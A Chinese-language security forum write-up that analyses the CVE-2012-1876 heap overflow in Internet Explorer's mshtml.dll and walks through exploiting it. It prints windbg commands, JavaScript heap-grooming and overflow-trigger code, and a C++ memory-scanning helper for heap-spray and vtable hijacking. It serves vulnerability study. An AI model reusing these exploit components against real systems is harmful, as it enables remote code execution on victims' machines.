看雪學苑 - CVE-2012-1876漏洞分析與利用－鑽石舞台

本文為看雪論壇優秀文章

看雪論壇作者ID：AshCrimson

一

漏洞信息

CVE-2012-1876

mshtml.dll中函數CTableLayout::CalculateMinMax，通過span屬性值作為循環次數向堆內存中寫入數據時，未對span進行有效的校驗而導致堆溢出，可實現RCE。

二

漏洞分析

調試ie，開啟子進程調試，開啟頁堆，定位堆溢出位置。

gflags.exe -i iexplore.exe +hpa.childdbg 1

溢出點，edi的值導致了crash,edi=[esi+18]，向上追蹤esi何處被賦值。

查看堆棧，CalCulateMinMax存在大量對esi的操作，對CalCulateMinMax函數下斷，進行分析。

首次加載頁面，會獲取一些屬性，第一個參數為Table標籤的類對象。

ebx=CTableLayout

ebx+0x54== 所有col標籤span屬性值的和，標記為spannum。

如果通過判斷:(this+0x94>>2) < spannum，則通過函數EnsureSizeWorker申請空間。

函數EnsureSizeWorker內部會進行判斷，確保最小申請空間為0x1C*4=0x70字節空間，並將地址存儲入this+0x9C處。

執行完之後會對this+0x94進行更新。

通過調用函數over_trigger修改標籤屬性，第二次運行CalculateMinMax。

此時this+0x94更新後==4,(4>>2)==spannum，所以不會再進行申請內存的操作。

此時GetAAspan返回值為0x3e8，說明span屬性值已經成功被修改，但是CTableLayout成員變量並沒有發生改變。

spannum仍然為1。

通過函數GetFancyFormat對修改後的width進行了一次運算(42765*100)<<4+9=0x4141149。

然後將參數傳入，通過函數GetPixelWidth進行第二次運算，最終通過width得到的結果為0x519159。

當運行到此處時，已經可以很明顯的看出漏洞成因了，壓入參數[ebp-0xc]也就是前面通過width計算出的值，通過函數AjdustForCol，循環1000次寫入堆中，每次寫入數據大小為0xC，而堆大小只有0x70，因為修改span後，沒有重新分配相應大小的堆空間,最終會產生堆溢出。

三

利用思路

構造堆的布局，進行占位，讓內存申請到釋放的位置。

第一次溢出覆蓋字符串長度，暴露mshtml基址。

第二次溢出覆蓋虛表指針，構造rop，通過heapspray將shellcode噴射到覆蓋的虛表指針地址，繞過DEP和ASLR保護，執行shellcode。

四

漏洞利用

第一步申請內存空間，寫入大量BSTR字符串，構造堆布局，釋放存儲字符"E"的堆空間，讓EnsureSizeWorker申請內存時，可以占用釋放的位置。

<div id="test"></div> <script language='javascript'> d = document.getElementById('test'); var dap = "EEEE"; while (dap.length < 0x200) dap += dap; var padding = "AAAA"; while (padding.length < 0x200) padding += padding; var filler = "BBBB"; while (filler.length < 0x200) filler += filler; var arr = new Array(); var rra = new Array(); //EEEE AAAA BBBB OOOO for (var i = 0; i < 1000; i += 2) { rra[i] = dap.substring(0, (0x100 - 6) / 2); arr[i] = padding.substring(0, (0x100 - 6) / 2); arr[i + 1] = filler.substring(0, (0x100 - 6) / 2); var obj = document.createElement("button"); d.appendChild(obj); } //theap A B button for (var i = 200; i < 1000; i += 2) { rra[i] = null; CollectGarbage(); }</script>

構造col標籤，進行占位。

通過windbg調試，輸出日誌，判斷是否成功占位。

sxe ld:jscriptbu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"bu mshtml!CTableLayout::CalculateMinMax+0x18C ".echo vulheap;dd poi(ebx+9c) l4;g".logopen c:\log.txt

程序成功申請到前面釋放的內存，這裡要去除頁堆，不然成功率很低。

當前內存布局，可以找到CButton虛表指針，需要通過它計算出mshtml基址，因為CButtonLayout虛表指針和mshtml基址的偏移是固定的，為了能夠讀取到這個值，需要通過溢出改變字符串B的長度，讀取CButtonLayout虛表指針。

第一次溢出，長度成功被覆蓋。

通過暴露的虛表指針信息，可以找到mshtml.dll基址，偏移為：0x1584F8。

獲取偏移後，再使用windbg調試，驗證基址是否正確。

第二次溢出覆蓋CButtonLayout對象的虛表指針進行覆蓋，控制程序執行流程。

這裡進行覆蓋的值=width*125，後面調用的虛函數地址為[eax+dc]，與漏洞戰爭書上略有不同。

function second_overflow() { //二次溢出,覆蓋CBttonLayout虛表指針 var col = document.getElementById(2); col.width = "1003572"; col.span = "29"; }

成功控制執行流程。

下面進行heapspray，構造shellcode噴射到這個地址中。

為了使覆蓋的虛表指針的值剛好是shellcode起始位置，並且eax+dc位置是xchg eax,esp ret指令地址，可以通過讀取內存快速查找對應地址，寫入第二次溢出的width中。

#include <iostream>#include <windows.h>int main(){ HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, 3920); int addr = 1000000; DWORD temp = 0; while (1) { DWORD val = 0; int ret = ReadProcessMemory(processHandle, (LPVOID)(addr * 125), &val, 4, &temp); if (ret) { printf("addr:%08x:%08x\n", addr * 125); } if (ret && val == 0x6ABD3142) { ret = ReadProcessMemory(processHandle, (LPVOID)(addr * 125 + 0xdc), &val, 4, &temp); if (val == 0x6AC401BE) { printf("result=%d\n", addr); break; } } printf("%x\n", addr); addr++; } system("pause");}

五

結果